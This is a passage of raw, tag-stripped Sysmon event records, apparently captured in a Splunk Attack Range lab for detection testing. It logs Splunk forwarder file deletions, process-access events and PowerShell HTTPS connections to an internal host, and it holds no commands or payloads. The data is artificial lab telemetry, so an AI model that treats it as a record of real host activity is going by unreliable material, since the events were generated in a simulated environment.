23542300x800000000000000036496313Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:27.036{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9247BB81F45E8E5C0F9669A3E500B332,SHA256=13EA9300F05734BF426A2235D5AF721BED3A11173733C3EA0C9CFD1DC66117F5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496312Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:56.863{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50394-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000036496311Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:56.784{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50393-false10.0.1.12-8000- 23542300x800000000000000036496314Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:28.050{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43BEE4B54CCCFF89F2764472045C950E,SHA256=3DD15922C9E191F05971C4F5BA5F6233099F04A231A849A21A0E63A12936D490,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496315Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:29.066{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92C2D4A628A9D8AC9A967AC03AF961DC,SHA256=CBC60F7D13EF742376A798F76D2B1328535F9549D7A253070D9295259309C0F7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496317Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:30.218{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=260C1EDA1F9985F2E83B122408B6EB13,SHA256=F3E339215CAD9BE2643742E6E78E0640B5904DE325065B43C0EE0F0549CB5C92,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496316Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:30.083{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=128FE290CF64BD4666DF3AD62B63BF16,SHA256=957D6EC85D4B461138F4F2348A4DDF0005CECECDDE49A45B1D4AFA2408F32B6A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496319Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:00.882{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50395-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496318Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:31.102{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=405D745660CEA799F2BA39E300D37B04,SHA256=C01BD2E091B0B76C953D2BDD6CDEE49650C8D4F9039CF99FFC28A700F79B29E7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496321Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:32.401{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496320Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:32.117{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F448CCE48D3AC07FD40ABE58E876349C,SHA256=1A0DEFBB552CE2910DF06E6E0161150B3DBDB5956B4EA93C02F197432236948E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496323Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:02.812{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50396-false10.0.1.12-8000- 23542300x800000000000000036496322Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:33.132{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=097E3276470EA7FBFC286D77F97532BC,SHA256=C535CA539B735C5BB682B89868D60A8F525DBFE92B28798753477352F0F8D28D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496325Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:04.058{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50397-false10.0.1.12-8089- 23542300x800000000000000036496324Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:34.147{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CAAECF622DCD8E75B154AC3FE06DE7E,SHA256=66FB0DBD7462A4F891F1963ECF2AA609838BCF9165225130B4B6B98D645C9827,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496327Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:35.461{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=513F5697C242CD676E1D47E0A5645F71,SHA256=60B1C4354FD93EE6A6E3D4A975C31082A2EB2BF7FF07EB2B5161BA0E6D7CAFB4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496326Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:35.161{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F595AF1F5C5F447D50E4598F5F1C8D99,SHA256=E52617E69021C380C59F6B67788B1111C662506E15B8FCC24146605FC14DE7F9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496329Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:05.895{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50398-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496328Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:36.178{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=718F8440EBAAA6FEF894C189929502B0,SHA256=9C3EDBA39DA8C7BBC93DA230B5F64507C3BF410C14BC59A731E21BCBFFAA9B9F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496338Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:37.879{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-9F89-6140-5656-04000000C801}5480C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496337Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:37.879{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496336Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:37.879{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496335Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:37.879{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496334Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:37.879{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496333Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:37.879{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-9F89-6140-5656-04000000C801}5480C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496332Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:37.878{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-9F89-6140-5656-04000000C801}5480C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496331Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:37.858{B81B27B7-9F89-6140-5656-04000000C801}5480C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036496330Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:37.196{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7AB4D86ACEA1664BD8E7671E8D555C75,SHA256=CA14662227DD0C16D8CD4885312F0700ACEC45B019CE77608B0C79B39E8A0DD7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496351Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:38.877{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7CF38580D836B52855E5B7088BA568F3,SHA256=1588BA5A98576072A656DCE07EB525E36D70BC3E71A6747518CDCF14261E7301,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496350Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:38.877{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=63BAAD576212EF1B67F6C699B83C66A2,SHA256=D1ECB69DE231408B9A26282A05A523048A97D81986DFAD696835DB6D17F830ED,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496349Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:38.557{B81B27B7-9F8A-6140-5756-04000000C801}36004544C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496348Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:38.410{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-9F8A-6140-5756-04000000C801}3600C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496347Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:38.410{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496346Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:38.410{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496345Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:38.410{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496344Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:38.410{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496343Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:38.410{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-9F8A-6140-5756-04000000C801}3600C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496342Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:38.410{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-9F8A-6140-5756-04000000C801}3600C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496341Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:38.395{B81B27B7-9F8A-6140-5756-04000000C801}3600C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036496340Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:38.226{B81B27B7-4024-611D-7300-00000000C801}2188NT 